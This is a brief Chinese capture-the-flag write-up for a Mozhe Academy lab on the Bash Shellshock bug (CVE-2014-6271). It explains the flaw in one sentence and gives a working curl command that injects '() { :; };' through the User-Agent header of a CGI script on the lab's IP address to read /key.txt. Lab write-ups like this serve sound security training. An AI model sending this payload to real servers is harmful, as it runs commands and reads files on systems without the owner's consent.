墨者学院-Bash漏洞分析溯源

靶场地址:

https://www.mozhe.cn/bug/detail/WUdydkxQMFdkSUVWa3NZaldtT2Evdz09bW96aGUmozhe

漏洞编号:CVE-2014-6271
漏洞原理:漏洞问题主要在以”(){”开头定义的环境变量在命令ENV中解析成函数后Bash的执行并未退出,而是继续执行命令。

找到poc.cgi: http://219.153.49.228:40485/cgi-bin/poc.cgi

访问url

poc.cgi获取了一些http信息,其中包括User-Agent
curl的-A参数可以修改User-Agent,执行以下代码就可以执行cat /key.txt命令
在kali下执行命令:

curl -A '() { :; }; echo -e "\r\n";/bin/cat /key.txt' http://219.153.49.228:40485/cgi-bin/poc.cgi
成功获得key

你可能感兴趣的:(墨者学院-Bash漏洞分析溯源)